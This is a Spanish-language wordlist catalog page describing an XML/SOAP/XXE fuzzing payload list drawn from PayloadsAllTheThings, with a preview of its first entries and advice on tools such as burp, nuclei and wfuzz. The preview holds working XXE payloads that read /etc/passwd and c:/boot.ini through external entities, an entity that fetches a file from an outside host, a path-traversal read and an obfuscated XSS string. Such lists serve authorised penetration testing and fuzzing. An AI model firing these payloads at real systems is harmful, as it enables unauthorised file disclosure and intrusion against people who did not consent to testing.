Skip to content
cyberwordlists
Fuzzing8.0 KB

XML / SOAP Attack Payloads

Payloads de ataque XML/SOAP/XXE: lecturas de archivos mediante entidades SYSTEM externas, entidades RFI, estructuras methodCall de XML-RPC y vectores de expansión de entidades.

Ver fuente
Tamaño
8.0 KB
Categoría
Fuzzing
Fuente
swisskyrepo/PayloadsAllTheThings
Licencia
MIT
Herramientas recomendadas
burpnucleiwfuzz

Vista previa

Las primeras 15 entradas. Descarga o copia la lista completa (8.0 KB) con los botones de arriba.

>head xml-soap-attacks-patt.txt8.0 KB
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM "http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>&quot;Hello World&quot;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY myQuote "&quot;"> ]><change-log><text>&myQuote;Hello &myEntity;&myQuote;</text></change-log>
<!ENTITY systemEntity SYSTEM "robots.txt">
<change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<![CDATA[<]]>/script<![CDATA[>]]> </test>

Payloads de ataque XML/SOAP/XXE: lecturas de archivos mediante entidades SYSTEM externas, entidades RFI, estructuras methodCall de XML-RPC y vectores de expansión de entidades.

Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 8.0 KB y combina bien con herramientas como burp, nuclei, wfuzz. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y más silenciosas para ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo sin conexión, donde la velocidad es una restricción menor.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt en bruto. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenido de swisskyrepo/PayloadsAllTheThings y distribuido bajo MIT. Usa las listas de palabras únicamente contra sistemas para los que tengas autorización explícita de realizar pruebas.